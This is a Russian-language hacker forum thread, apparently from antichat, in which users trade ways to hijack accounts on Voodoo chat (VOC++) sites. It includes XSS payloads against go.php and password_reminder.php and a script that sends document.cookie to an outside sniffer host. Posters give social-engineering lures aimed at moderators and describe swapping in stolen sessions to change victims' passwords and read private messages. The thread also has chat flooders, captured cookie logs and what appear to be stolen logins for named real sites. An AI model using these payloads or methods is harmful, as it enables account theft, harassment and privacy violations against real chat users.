Через фрейм отправки письма возможно ломануть?

Через фрейм отправки письма возможно ломануть?

Вообще то как говорят Vodoo нельзя ломануть ...
Дай линк Vodoo посмотрю похож ли на мой чатик...

Сломать можно всё.
Сниф + СИ + знания php

В чате есть пассивные xss. Так что ищите.

В чате есть пассивные xss. Так что ищите.

Я нашел алерт но снифф туда впихать не получается .. вот так вот :( лажа(

Сломать можно всё.
Сниф + СИ + знания php

Гы ...а ты сможешь например? И еще причем тут СИ ?
Я так понял что ты это имел виду потому что пхп и СИ связаны друг с другом, или как ? :confused:

СИ - социальная инженерия
Там можно кое где оставить ссылку на снифер, а дальше дело техники =)

Вообще то как говорят Vodoo нельзя ломануть ...
Вы бы хоть писать научились...Если вы про чат то пишется Voodoo chat(модер переделай название что ли)
Выкладываю на паблик давнейшие хсс(попробуйте исполльзовать с фреймами...)
------------------------------
Type:[XSS]
Product: Voodoo chat
Author:qBiN
exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность
с помощью сокетов.
------------------------------
Type:[XSS]
Product: Voodoo chat
Author:qBiN
exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
------------------------------
для спасибо есть репутация,не загаживайте форум.

Это то я понимаю, но вот вопрос весь в том что ссылки открываться через другую страницу http://www.chat.ru/go.php?url=http%3A%2F%2Fwww.test.ru
Тоесть снифер не сможет сессию прочитать.
А вот через фрэймы это как ?

А вот через фрэймы это как ?Уже апсуждалось...Создаешь сайт с невидимым(или маленьким) фреймом(который указывает на хсс),кидаешь линк в чат и смотришь логи,там вроде на сессиях,так что не проворонь.

для спасибо есть репутация,не загаживайте форум.

Ну хорошо ...признаю что я не умею писать :D )))))
А твоя фишка чё то не работает вот если бы было на оборот то кликнул бы 2 раза на крестик ...ээ тьфу на плюсик))) :)

Знаеш что наталкивался я на такой прикол и ты проверь...Короче захоти по адресу http://www.urlchat.ru/data/who.dat или http://www.urlchat.ru/chat/data/who.dat

Возможно админ лоханулся и оставил директорию открытой такое бывает тогда найдеш в этом файле все сессии..Если конечно эта папка (data) вообще в веб директории...

Я на VOC++ Christmas Edition делал так:
В профиле, в поле "Мой сайт" вставлял ссылку на сниффер, а в дополнительной информации писал: "Смотрите мою фотку по ссылке ниже."
Затем говорил в чате у меня новая фотка всем читать инфу.
Обновлял снифер и видел сессии, далее подменял их и всё.

А твоя фишка чё то не работаетруки откуда растут,недавно тестил,усе работало...Мож у тебя на сайте Voc++ это другой продукт отснованный на вуду чате.

Ну незнаю ...я тебе скину линк я что то в их версиях не могу разоброться ... :confused:

востановления пароля нету,а уязвимость с go.php прекрасно работает,не открывает ничего в новом окне даже...

Киньте мне ссылку посмотреть

love-chat.ru

Вот чё то надыбал http://love-chat.ru/server-status, там есть обращения к скрипту voc.php, и вот что я нашёл voc.php?user_name=GreenPeas&password=xxx&user_color=0&room отсюда следует GreenPeas - логин, xxx - пароль, так ещё пара таких же запросов мелькала, если хошь посиди часок другой мож амдин промелькнёт =)) Если помог не забываем про репутацию...

Интересно, теперь скажи а где это проканывает ?

Кстати там ещё сессии показывает, можно просто подменить сессию...

а где это проканывает ?Только на этом сервере, к Voodoo Chat'у отношения нету...
зы:хорошо бы тему почистить...

Только на этом сервере, к Voodoo Chat'у отношения нету...
зы:хорошо бы тему почистить...
Плохо, но идея интересная. В чём ошибка админа ? Права неправильно выставил ?

востановления пароля нету,а уязвимость с go.php прекрасно работает,не открывает ничего в новом окне даже...
На love-chat.ru go.php работает и очень даже не плохо...

Вот поковырялся в этом чате и нашёл такую вот фишку, http://www.love-chat.ru/designes/city/

Ошибка.
-----------------------------------------------------------------------------------------------------------
Warning: main(designes//welcome.php): failed to open stream: No such file or directory in /www/home/user1/domains/love-chat.ru/public_html/designes/city/index.php on line 2

Права неправильно выставил ?Скорее неправильно настроил апач =)
Ты бы хоть совмещал посты по 1 строчке.Может смысла больше получится.Ошибка.Не больно догнал как это относится к самому чату,это просто херовый шаблон. С этой ошибки максисум - раскрытие пути.

Давно я на ачат не залазил ... вылез только
http://www.balartrating.ru/flood.zip - вот моя флудилка ... маты генирирует.
Давно просили выложить ...
Кому не понятно - спрашивайте. Или стучите мну в асю 623453

Клёво работает, плюсик заработал =)

Ребятки! посмотрите и сюда http://www.azerilove.net/chat че то не могу там ничё зафигачит

Воспользуйся флудером который был представлин Nax[no]rt,она работает в этом чате http://www.azerilove.net/chat я проверил.

Слушай ..у меня опять ничё не вышло а как ты это сделал ...php инклюд или как ? можешь описать ?

Да что тама объяснять, берёш скрипт прописываеш сылку , вставляеш свою сесию, и потом закатай на хост с подержкой Php, открой прямую сылку к файлу и смотри в чат, всё просто прекрассно работает.

Я так и сделал ..но наверное тогда народ не поддерживает пхп ...ничего поищу бесплатных хост пхп.
Спасибо дружище ...

Народ и так пхп не поддерживат, зайди на jino-net.ru

Я уже задолбался с безплатным хостом пхп нигде не могу найти и в jino-net.ru регистрация временно остоновлено((

holm.ru пробовал?

Угу ..пробовал ..зарегил даже 2 но пароль на мыло так и не получил ..вот уже 2 день жду

Вот мая ася 245547183 у меня на хосту стоит уже этот скрипт, если что могу дать использовать.

Я всера постучался на твою асю а ты ушел((
Ну ладно как нить поговорим. А где твой хост? дай лин может там смогу зарегиться ..а то не терпиться попробовать))) мне очень интересно как получеться ))

Смотрю много жалоб на php , скоро на JS напишу )))) тогда легче будет )

# 300 сообщение =)))
# Предлагайте свои идеи - реализуем ;)

Было бы здорово))) Давай ...а мне остаеться только пожелать тебе в этом удачи :)

А как ты это сделаеш если не секрет, как я знаю Js клиентский язык пронрамирования, я сам почти всё на нём делаю, но как ты будеш обрашятся к чату ? если не секрет.

Незнаю меня и на php устраивает...

А как ты это сделаеш если не секрет, как я знаю Js клиентский язык пронрамирования, я сам почти всё на нём делаю, но как ты будеш обрашятся к чату ? если не секрет.
К чату )) главное сессия ... все поля делаю скрытыми, а потом делаю автоматом отправку в цикле, вот и всё )) ничего сложного ПХП наешь? посмотри код, всё поймешь ...

Да знаю смотрел очеь не плохо, если что собираюсь его немнога модернизировать как время будет.

Короче ребятки перехватил я сессию в Voodoo чате но я не могу расшифровать пасс ....там кажеться другой алгоритм хэша используеться
вот вам лог сниффа ...если кто нить сможеть расшифровать хэш то буду блогадарен

QUERY: 08&c_user_name=Масяня; c_design=love; c_user_color=18; azlastvisit=1121377141; azlastactivity=1121379209; azuserid=223; azpassword=0e20b0d964034b6471f6bdcfe839be9d; vbcodemode=1; vbulletin_collapse; PHPSESSID=fd773b653a8e3e56748d48e3ea5aa79b; azsessionhash=043a7b2435d4cf5c000e48787655d0d8; azthread_lastview=ax4x-ix171ysx10x"1134571927"yix5ysx10x"1095059921"yix50ysx10x"1103268463"yix36ysx10x"1100009233"y_
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218)

ПО-моему пассы от чата нигде на компе не хранятся. ПРосто даётся тебе сессия и всё ))
Можешь сохранить на винт себе sender.php , переправить все пути и во всех полях hidden сменить сессию на захваченную. Сохраняешь и пишешь уже как от того чела

Да ты прав я даже под оперой зашёл, посмотрел куки , а тама нечего кроме сесии(((

Да ты прав я даже под оперой зашёл, посмотрел куки а тама нечего кроме куков(((
А что значит "даже" ? )))))))))))

Если сессию перехватил то пароль поменять трудности не составит.
http://www.yourchat.ru/user_info.php?session=
После равно вписываешь стыренную сессию и по этой ссылке заходишь в окошко смены инфы пользователя, а там ввод старого пароля не требуеться поэтому свободно сможешь поменять на свой. (Путь до user_info.php может быть немного другой)
Хотя в моём случае не прокатывает, и писать от чужого ника тоже так как стоит какая то повышеная безопасность, то ли сверка с ip то ли ещё что то точно не знаю. Но читать приваты вполне можно.

А кто может подсказать как можно читать шелл voodoo чата ?

Еще раз всем привет! Ребята то что вы говорите не получается у меня ,я с самого первого раза решил подменять сессии …в Ie , использовал Ie Xss Kit открыл смену личной информации в чате затем открыл скрытые сессии с помощью Ie Xss Kit
Там у меня открылся окошко с хэшом я взял с логов хэш и вставил в месот своего а затем сменил пароль ….пишет что в чате нет такого пользователя ?. Но если я захожу в чат под двумя никами открываю как я уже указал скрытою сессию и перекидываю хэш с одного на другой и меня пароль то получается . Идиотизм какой то ….. Я уже однажды написал как я спёр у мёдра ник …в том случае я добился того что мёдр копернул свою сессию с браузера и отдал мне )))) тогда тоже получился …я взял хэш и подменял …а так не выходит …и к тому же мне не нужно красть этот ник ..мне нужен пароль от этого ника! Дело в том что этот ник один из ников модерши и я разузнал что она использует один и тот же пасс для всех своих ников.
Вот так вот…

А пароль никак не получиться узнать, попробуй узнать пароль например на форуме где она зарегистрирована или от почты...

чуваки. чё за снифферы вы используете - которые перехватывают Id ?

мдаа, ник у тебя конечно))))
точно в бан уйдёт)

2 Антошка2003
а чё с ним нитак?

да у нас у модера такой, ну почти .::Ghost::. такой вот вроде

2 Антошка2003
хех ну яж ни .::Ghost::. а Gho_st :]

ну смари сам, дело то не в символах. а в смысле слова, ладно, хорош оффотить

Ну и ну ...а я то думал чё нить предлогают или у кого то есть алтернативный вариант вообщем надеялся на хорошие новости а вы тут ник обсуждаете ..)))

млин объясните наконец как перехватыывать Id сессии

Читай внимательнее я писал уже об этом.
http://forum.antichat.ru/showpost.php?p=84635&postcount=15
Но проканывает не везде !!!

2 Night_wolf
хех тады такой воопрос.
чё за сниффер ты юзал?

Античатовский =)

Помогите с чатом на дыры,его адрес www.primochka.ru.За ранее спасибо

млин.. совсем лоховской воопрос... какой параметр в сниффере нада вбить шоб на него Id отсылался.. а то я тут парюсь а у мя нихрена ни выходит

В снифере ничего менять не надо !!!
Просто ссылку на него в профиль себе поставь и направляй туда пользователей.

2 Night_wolf
зделал и чего получаю голый Ipшник...
:mad:

а нужен ID сессии

Если какойта юзер нажал но ту сылку где находится снифф,то снифер должен паймать всё, значить ты что-то не так делаеш.

я на себе тестил.. ну жму на эту ссылку.. и что дальше, дальше в сниффер выдает мне только мой Ip...

ни Id ни даже аддреса откуда я пришол я так и не увидел

Дай адресок чата, я гляну.
Там скорее всего идёт пересылка через пустую страницу, тоесть если ссылку в чате открываешь то она не с самого чата открываеться а сначала страница пустая, а потом уже на сниффер идёт, таким образом сессия и не определяеться.

2 NIGHT_WOLF
пробовал на chat.gameguru.ru
хех да там открывается пустая страница с ввв.чат.ку/go?url=аддрес

Вот я о чём и говорю...
Можешь воспользоваться флудером =)

2 Night_wolf
хех юзал я этот флудек как-то...
нее мне не сколько напакастить надо сколько спереть один аккаунт

Привет ребятки. попробуйте так сделать.
Короче впихаете в гифку одну из этих скриптов <a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
<img src="http://antichat.ru/cgi-bin/s.jpg">
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и загружаете в инфо , потом открываете свойства и берете полнуй путь к гифу, этот адрес пишете в место где вы должны указать ваш URL и инфо , если есть вазможность то скрывайте гифку кот не открывается т.е на чем стоит крестик ...потом уже вам придеться использовать СИ что бы мёдр нажал на линк ...Во всяком случае у меня так получился перехватить сессию здесь пример (http://forum.antichat.ru/threadnav11144-5-10.html)

php и си свзаны друг с другом как японский и турецким.

Ну это как посмотреть ...ели ты имеешь виду C или С++ то они мееют связь с Php но если ты имеешь СИ ( Соц Инженерия) то это не имеет как ты уже отметил "японский и турецким".

хех перехватил тут куки в ВОК++ вощем там как я понял был хеш чейто
поскажите чем его расшифровать

хех перехватил тут куки в ВОК++ вощем там как я понял был хеш чейто
поскажите чем его расшифровать
Это сессия !!!
Она не расшифровываеться.

2 Night_wolf
нет это не сессия
я её сверил с той что в Html коде просматривается

2 Night_wolf
нет это не сессия
я её сверил с той что в Html коде просматривается
Сессии то разные например:
069d16677e19bd47fa94786c89e9a5d5
или
413535e8ea5ae7d615ef239b4f383ba6
или
50fe88f4b05b05fdcb0a51dc59af03f1

Это примеры с реального чата, они не расшифровываються. А ты чем вылавливал и что вообще именно ты получил. Скопируй сюда посмотрим.
***
А вот есть у кого нибудь БОТ которого можно подвесить под своим именем и чтобы когда тебя нет он висел в чате ?

2 NIGHT_WOLF
хех ды я просто напросто просмотрел куки ))
javascript:alert(document.cookie)
---
на счёт сессий.. хех я знаю что они не расшифровываются
их кстати использовать на много легче
на пример при их перехвате достаточно написать
чат/sender.php?session=имя сессии
и фсё мона писать от имени хозяина сессии

Ты наверное имеешь ввиду вот это
c_hash=59ce35d2ccde59d98f5c2e66b5f364ff

А какую ты XSS использовал чтобы это выловить ?

к флудеру вернёмси, у мня что то он тоже не стал работать, рибят пасматрите пачиму, вот в этом чате _http://orenchat.ru вроде всё прально настроил. ставил на jino-net

к флудеру вернёмси, у мня что то он тоже не стал работать, рибят пасматрите пачиму, вот в этом чате _http://orenchat.ru вроде всё прально настроил. ставил на jino-net
Отправил. Сессию свою подставь и будет тебе счастье =)

всё, понял уже, я ж тебе там уже ответил, отвечу тут, я не подставлял sender.php невнимательный стал=)

к флудеру вернёмси, у мня что то он тоже не стал работать, рибят пасматрите пачиму, вот в этом чате _http://orenchat.ru вроде всё прально настроил. ставил на jino-net

Я зашел что бы попробовать пофлудить в твоем чате ...даже пофлудил и мне вот такое написали (15:58:43) >> XyliGaN_Ka: тима> Антон эт ты?
ты кажется там довольно известен ))))) :D

эээ, ну да, есть такое дело=))))))

Кончайте флудить =)
Давайте по теме.
Кто нибудь бота делал ? И вообще возможно это ?

Давайте по теме.
Кто нибудь бота делал ? И вообще возможно это ?

Да меня тоже такой вопрос интересует по поводу бота !
Кстати говорят что бот для чатов Бородина есть но я не видел написан на Delphi !

Меня интересуют сырцы бта или что нить ещё могу переделать под наши нужды только Шаблон нужен а то так долго мучаться буду !

--------------
Извеняюсь за офтоп
--------------

ыыы ))) освобожусь, расскажу как бота в вуду делать ) ничего сложного =) можно даже самообучающегося ) но его плохому научить мона )

r†']ыыы ))) освобожусь, расскажу как бота в вуду делать ) ничего сложного =) можно даже самообучающегося ) но его плохому научить мона )

Я буду ждать !
Осовободишся если чо в приват или в аську напиши 641-093

Окей ?

Я тоже ждать буду =)

эээ, ну да, есть такое дело=))))))

Мне вот как то после твоих "ээээ" даже не ловко стало , если чем то помутил то сорри...

r†']ыыы ))) освобожусь, расскажу как бота в вуду делать ) ничего сложного =) можно даже самообучающегося ) но его плохому научить мона )

Дорогой NaX[no]r† когда ты говоришь такие вещи то я выдохновляюсь почему то )) Думаю хорошо что в мире есть такие чуваки кот творят такие штучки ;) так держать. Я тоже жду !

2 NIGHT_WOLF
ды просто кинл линк
ввв.чат.ку/go?url=
javascript:alert(document.cookie)
+ СИ и мне чувак двыдал свой хеш

2 NIGHT_WOLF
ды просто кинл линк
ввв.чат.ку/go?url=
javascript:alert(document.cookie)
+ СИ и мне чувак двыдал свой хеш
Ясно, ну выловил ты куки теперь подмени их и всё.
Вот чем зашифровано мне тоже интересно.
У тебя icq есть ? Спросить кое что хочу.

2 Night_wolf
9-022-717 ;)

Дарова всем! хотел попросить парни вас..что бы вы подсказали как угонять в этом чате сеесию.(чат тоже на двигателе voodoo).а то я пробовал снифером, не фига не как не идёт, только IP показыват :mad: !! Плюсик обеспечен кто поможет!! срочно)!
Ниже я оставлю украденый ник и пасс..что бы вам не регестрироваться..

URL http://newchat.flirt.ru/
nick: (((SMK)))
pass: 6789


:confused: :confused: :confused: :confused:

Дарова всем! хотел попросить парни вас..что бы вы подсказали как угонять в этом чате сеесию.(чат тоже на двигателе voodoo).а то я пробовал снифером, не фига не как не идёт, только IP показыват :mad: !! Плюсик обеспечен кто поможет!! срочно)!
Ниже я оставлю украденый ник и пасс..что бы вам не регестрироваться..

URL http://newchat.flirt.ru/
nick: (((SMK)))
pass: 6789


:confused: :confused: :confused: :confused:

Читай тему внимательней !
накрайняк www.google.com в помощь ищи темы про впаривание снифера !

Да не дуракчёк я как ты думаешь!.. умею я впаривать снифер, так как у самого есть свой....только я говрю не вытаскивает он сессию..в этом чате не много подругому всё...

ищи активную Xss

ищи активную Xss

Тоже вариант !

Или ещё способ как обойти редирект через пустую страницу....

Неа..нету паходу в этом чате нефига...Не кто не поможет значит? :confused: А бота сделали для этого движка или нет ещё?

r†']ыыы ))) освобожусь, расскажу как бота в вуду делать )

Ну где же ты мы ждём тебя......
И бота ждём....

заффтра будет ))

r†']заффтра будет ))
Окей буду ждать....

Кстати а есть что нибудь как редирект обойти через пустую страницу ???

Блин тему вниз опустили а ответа нет....

NaX[no]r† куды ты там пропал не в аське не здесь не появляешся.... стукни ты мне если не внапряг... 641-093

взломать можно всё, это только вопрос времени))) ©

Я так и не понял. Вуду чаты уязвимы ели нет???

Уязвимо всё но если грамотно написано найи сложно...

Хотелось бы понять как обойти бан ежели юзать прокси не катит, либо я просто не могу найти подходящий, страничка чата просто не открывается!!!
Chat.gameguru.ru, можете попробовать проверить - ник Xaker пароль: adsl да, хотелось бы найти дыры в нём!
P.S. за хелпу подниму репу!

Хотелось бы понять как обойти бан ежели юзать прокси не катит, либо я просто не могу найти подходящий, страничка чата просто не открывается!!!
Chat.gameguru.ru, можете попробовать проверить - ник Xaker пароль: adsl да, хотелось бы найти дыры в нём!
P.S. за хелпу подниму репу!

Гыыы ты ник и не зарегил братан))))

http://www.azhack.ho.com.ua/Chat.JPG

Поэтому у тебя нифига не открывается ....в таком случае пользуйся другими браузерами типа Опера и Фаейрфокс

есть проги которые меняют ИД браузера, винды, даже медиа плеера. поищи на форуме, было где то написано.

Есть одна маленькая фишка в Chat.gameguru.ru ...значит так...
Ты можешь зарегить ники которые вошли без регистрации, для этого сам заходишь в чат с простым ником без регистрации открываешь фрейм регистрации и в место своего ника пишешь ник который не зареген и пишешь свой пасс... =)
3 года назад так делал))) а фишка со сниффом в гифке там не прошло ...хотя и чат не филтерует расширения риссунков но не получился =(

попробовал я так, не прокатило тоже.

А вот по части бана. Допустим ip ты поменял, id браузера тоже, кукисы почистил, то думаю сможете зайти но с другого ника. Потому что есть ещё бан по UN тоесть UserName это я так к сведению.

Сидел короче ночью.Мозг уже в коме. Тыкаю в чате куда попадется. И натыкал.
Короче - можно зарегать ники
ЧАТ
ПАРНЯМ
ДЕВУШКАМ
АДМИНЫ
ВСЕМ
ШАМАНЫ
Не взлом конечно, но крови попортить можно :)

по поводу ГГ чата могу сказать одно.. ходят слухи что там както увели аккаунт у когото из модеров после чего администрация серьезно занялась защитой чата..
уязвимостей по ходу там реально нет (ссессию на сниф мне поймать так и не удалось)

Так редирект через пустую страницу можно обойти интересно или нет ???

2 Nova Если у тебя получиться - отпишись. Мне тоже интересно.

2 Nova Если у тебя получиться - отпишись. Мне тоже интересно.
Ну энто само собой...

Так редирект через пустую страницу можно обойти интересно или нет ???
Ребят чё замышляете ? можно с обяснениями ...а то вудду у меня в выше горла сидит )))

У меня есть! А вообщето вот тут можно скачать)) http://vochat.com/downloads.ru.php

Предлагаю собрать наши мозги в небольшую локалку и расковырять исходники! вместе мы сила! У кого есть исходники чата?
У меня тоже есть ЗДЕСЬ (http://www.azhack.ho.com.ua/voc.rar )

Народ! Подскажите свои мысли насчет чатика http://chat.mogilev.by
login: qwe
password: qwerty

Что я могу сказать...Админ там ганд...н. Модеры - там редчайшие сволочи. Правда не все.... А чат...хз

Привет ребятки! Значит дело обстоит так ...меня спалили кажись админу чата которого я хочу юзать ...так что от вас тоже прошу что бы об найденных уязвимостой не вытащить на паблик если что то стукните в асю 195165911 а если у вас есть Msn то можно устроитить там чат!

NaX[no]r† ну что там с ботом то ?

Случайно попал на ваш форум понравилось, ну я зарегился и решил помочь...

POST http://www.butovo.com/chat/sender.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-icq, application/x-comet, application/x-shockwave-flash, */*
Referer: http://www.butovo.com/chat/designes/hi-tech/sender_visible.php?session=5937b74afff8850354cb786 83530816c&user_color=27
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.4 (build 01334))
Host: www.butovo.com
Content-Length: 183
Pragma: no-cache
Cookie: c_user_name=Marusia; c_chat_type=tail; c_design=hi-tech; c_user_color=27; PHPSESSID=7d57b4c3f1b99a059bfb6e53bfb60aa7

session=5937b74afff8850354cb78683530816c&mesg=%C5%F1%F2%FC+%F1+%EA%E5%EC+%EF%EE%EE%E1%F9%E0 %F2%FC%F1%FF%3F&send=%D1%EA%E0%E7%E0%F2%FC&whisper=&user_color=25&style_b=&style_i=&style_u=

Это запрос к скрипту для тех кому лень учить PHP.. Теперь вставляем этот запрос в пагу какуюнибудь и жмем отправить.. Вот написал пример на Delphi для флужения на чате butovo.com http://hackni.dontexist.org (за рекламу прошу не считать)

Случайно попал на ваш форум понравилось, ну я зарегился и решил помочь...

POST http://www.butovo.com/chat/sender.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-icq, application/x-comet, application/x-shockwave-flash, */*
Referer: http://www.butovo.com/chat/designes/hi-tech/sender_visible.php?session=5937b74afff8850354cb786 83530816c&user_color=27
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.4 (build 01334))
Host: www.butovo.com
Content-Length: 183
Pragma: no-cache
Cookie: c_user_name=Marusia; c_chat_type=tail; c_design=hi-tech; c_user_color=27; PHPSESSID=7d57b4c3f1b99a059bfb6e53bfb60aa7

session=5937b74afff8850354cb78683530816c&mesg=%C5%F1%F2%FC+%F1+%EA%E5%EC+%EF%EE%EE%E1%F9%E0 %F2%FC%F1%FF%3F&send=%D1%EA%E0%E7%E0%F2%FC&whisper=&user_color=25&style_b=&style_i=&style_u=

Это запрос к скрипту для тех кому лень учить PHP.. Теперь вставляем этот запрос в пагу какуюнибудь и жмем отправить.. Вот написал пример на Delphi для флужения на чате butovo.com http://hackni.dontexist.org (за рекламу прошу не считать)

Да флудер уже есть на php написаный в этой теме валяеться гдето.... с ним удобней....

Да флудер уже есть на php написаный в этой теме валяеться гдето.... с ним удобней....
А там кто то на счет хостинга терялся... А у меня все просто на Дельфе под винду. и пакету пуляются с твоего компьютера и не видно табличку флуд..

хех наканец таки вставил сниффу в Вос

воопросы такие что за странный ид юзера (3х значиный)
и что за параметр с_hash за что он отвечает?

Простите, а не подскажете как менять сессии? Опера этот чат не поддерживает =(

CookieEditor nебе в помощь и дя таких чатом юзай IE или Maxon.

В профиле, в поле "Мой сайт" вставлял ссылку на сниффер, а в дополнительной информации писал: "Смотрите мою фотку по ссылке ниже."
Затем говорил в чате у меня новая фотка всем читать инфу.
Обновлял снифер и видел сессии, далее подменял их и всё.
Как мне допустим это сделать http://chat.tus.ru/password_reminder.php?look_for=%3Cscript%3E
Вставить сниффер туда

В профиле, в поле \"Мой сайт\" вставлял ссылку на сниффер, а в дополнительной информации писал: \"Смотрите мою фотку по ссылке ниже.\"
Затем говорил в чате у меня новая фотка всем читать инфу.
Обновлял снифер и видел сессии, далее подменял их и всё.
Как мне допустим это сделать http://chat.tus.ru/password_reminder.php?look_for=<script>
Вставить сниффер туда
поймал сессию , открываешь *мои данные* берешь в руку XSS_Kit открывешь хидден сессии видешь свою сессию... выделяешь и del вставляешь сессию жертвы ...меняешь пасс и нажимаешь обновить

у меня тут возникла следущая идея
а нельзя ли как нить на сниффер вывести не куки а функцию whoList ибо в ней также содержутся ID сессий

Теоритически возможно.. А практически прийдётся писать сниффер только под вуду, если хочешь угонять сессию-)

Id и так видно .... но сессию поймать сложно ...
Открывашь инфу юзера и наводишь мыш на отправить сообщения на личику и внизу браузера смотришь Id юзера

внизу браузера смотришь Id юзера
Если бы так всё просто.. Не помню в каком это было чате, но вроде в вуду. Делал по таком у же принципу. Наводил на отправить сообщение, показывалось айди. Так же оно палилось через сорцы, я думал что заепца и щас я ник угоню. Но не тут то было-) Ради проверки решил сделать тоже самое с другим юзером, айди был тот же. Проверил ещё на нескольких. Айди тот же. Так что это не айди юзера, а твой собственный. Через сорцы он ясное был виден, т.к. при заходе в форму отправки, вписывались твои данные. Так скорей всего и в этом случае. Просто на ссылке отображался айди с которого отправляешь, а не на который. Так что протестируй на других.

не встречал ни один чат, у которого в сорцах был виден Id, тем более уж в Вуду.

voc/chat/who.php?session=bbd874ab05af7b83f968bc5d6d9e2546&send_to_id=785

&send_to_id=785 вы про этот id?

у которого в сорцах был виден Id
Не чужой айди, а свой.. Такое часто бывает, в чатсити\кроватке та же шняга.
voc/chat/who.php?session=bbd874ab05af7b83f968bc5d6d9e2546&send_to_id=785
&send_to_id=785 вы про этот id?
Скорей всего да, но смотря на эту ссылку понимаю что всё же отсылается на какой то айди а не с какого то. Здесь отслыка идёт только с сессии.

ток нафига здалось это ID я говорил не об ID пользователя а о SessionID(сессии)
__
вопрос почему на обычную сниффу нельзя поймать whoList
по идее ведь тож самое что и куки.. чёто я никак догнать не могу

sL1P
Так что это не айди юзера, а твой собственный.
Да уж ...я тож щас проверил ты прав))
Gho_st
вопрос почему на обычную сниффу нельзя поймать whoList
по идее ведь тож самое что и куки.. чёто я никак догнать не могу
Ты не путай ... в некоторых чатах пасс сохраняется в куках например в MD5
а в вудду в куках сохраняется сессия , временное переменная. Юзер вышел из чата то всё! ..Нихрена ты не сделаешь с его куками если даже он сам тебе их отдаст

Ребята у меня вот такая идея можно ли на PHP или на каком нить серверном языке скодить прогу чтоб она генерировала сесии и сохранял например в txt файл и чтоб сессии были точно такие же как и в вудду

2 Electro
как ты это сделаеш если они рандомно присаиваются

а в вудду в куках сохраняется сессия , временное переменная. Юзер вышел из чата то всё! ..Нихрена ты не сделаешь с его куками если даже он сам тебе их отдаст

сессия в куках.. где эта ..(ну мош разве что в старых версиях)

зная сессию можно а) банально угнать акк б) писать, банить от др ника, читать приваты и т п

только в том и тема что в Вуду сессии в куках нет
если б была всё было бы намного проще.. вон они XSSки
чат/go.php?url= куки спереть беспробем только толку?

Впринципе создание такой проги вполне реально, главное разобрать сессию, и понять по какому принципу её создают. Electro, флаг в руки-) Всё же сессия не может приписываться рандомно.

сессия в куках.. где эта ..(ну мош разве что в старых версиях)

У тя XSS_Kit есть?? Если есть то сделай следющее
Когда будешь в чате то открой контекстное меню и выбери там Куки
Там ты увидешь свой хеш... это хеш в принципе но там идет c.hash=xerxerxerxerxerxerxerxerxerxer потом по моему юзер нейм , колор и еще что то ...

Впринципе создание такой проги вполне реально, главное разобрать сессию, и понять по какому принципу её создают. Electro, флаг в руки-) Всё же сессия не может приписываться рандомно.

взято из Voc.php
$session = md5(uniqid(rand()));


__
чесно скажу IE XSS kit не юзал(к своему стыду)
я поступаю сл образом -> вбиваю в аддресную строку броузера в которой открыт чат
javascript:alert(document.cookie)
и броуз мне тутже демонстрирует содержимое куков

Юзай XSS_Kit
http://forum.antichat.ru/thread20212.html

взято из Voc.php
$session = md5(uniqid(rand()));


а возможно ли что сессия генится с твоего собственного id?

Нет, не возможно.

Сессия нужна сугубо для идентификации пользователя, который залогинился в чат. Никакой привязки к индексу профиля пользователя в чате НЕТ -- строка сесси генерируется псевдослучайным образом.

а жаль....:(
можно еще такой вопрос в куках параметр c_hash это что? хеш пароля? какой нибудь идентификатор?

там нет никакого пароля ....пароли как я знаю хранятся в БД в чистом md5

хмм...а что это тогда может быть?

можно еще такой вопрос в куках параметр c_hash это что? хеш пароля? какой нибудь идентификатор?
Хеш куки. К сессии в чате не имеет никакого отношения. Используется как один из вспомогательных механизмов безопастности.

ну хеш кукисов в стандартной сборки не сипользуется для безопастности. насколько я помню он участвует только в бане, т.е. кроме ника/ip/под_сети банится еще и браузер.. кстати, нафига тогда бан хеша браузера?

Против прокси :-)

если свою сессию отправить в главный фрейм чата в нем высвечивается не сессия а 1234! это что такое? еще один способ защиты?

а через админку можно ли как-нить веб-шелл залить?

Стандартного функционала нет.

http://chat.matrix.odessa.ua вотЬ - ломаеться раз по 5 в день !

www.chat-kislovodsk.onio.de что с этим?помогите плиз я знаю логин www.chat-kislovodsk.onio.de/admin но не знаю пароль...что делать и как делать?
login: CRASH
password: ?

помогите чем можете...мне очень нужны эти права админа...

Если что стучите в асю 600-121

login: CRASH
password: 3t0н3п4R0L'-RmUд4k

еси памог паставь плюс

не работает...

да я просто в акуе ...чеза мля дурдом..анти-чат ну вы че да я понимаю бабло ну там за тесты на взлом..(((( такая тема стока постов..и тут DareDevil вам советует ахах как его чат ломануть где у него баги..мля АДМИНЫЙ милые.... закройте темы связаные c VOC++ ..просто тошно..(((

да я просто в акуе ...чеза мля дурдом..анти-чат ну вы че да я понимаю бабло ну там за тесты на взлом..(((( такая тема стока постов..и тут DareDevil вам советует ахах как его чат ломануть где у него баги..мля АДМИНЫЙ милые.... закройте темы связаные c VOC++ ..просто тошно..(((
афтор это что? крик души? если помочь ничем не можешь, то молчал бы лучше!
сорри за оффтоп!

Почему персональный сниффер ачата не работает?

Почему персональный сниффер ачата не работает?
пользуйся публичным

DareDevil вам советует ахах как его чат ломануть где у него баги.
Выпивая -- закусывайте.

']пользуйся публичным

Помоему не тебе был адресован вопрос!

http://www.love-chat.ru/designes/lov/sender_visible.php
http://www.love-chat.ru/designes/lov/whois/test.txt
http://www.love-chat.ru/designes/lov/whois/example.php
http://www.love-chat.ru/change_password.php

http://www.love-chat.ru/edit_clan.php - Здесь вообще АШЫпка
http://www.love-chat.ru/impro.php

http://www.love-chat.ru/sorttest.php - Это что-то новое....
http://www.love-chat.ru/user_status.php

http://www.love-chat.ru/logs/

Новая бага:
http://www.milw0rm.com/exploits/3044

некачает:( и что там за бага то?

некачает:( и что там за бага то?
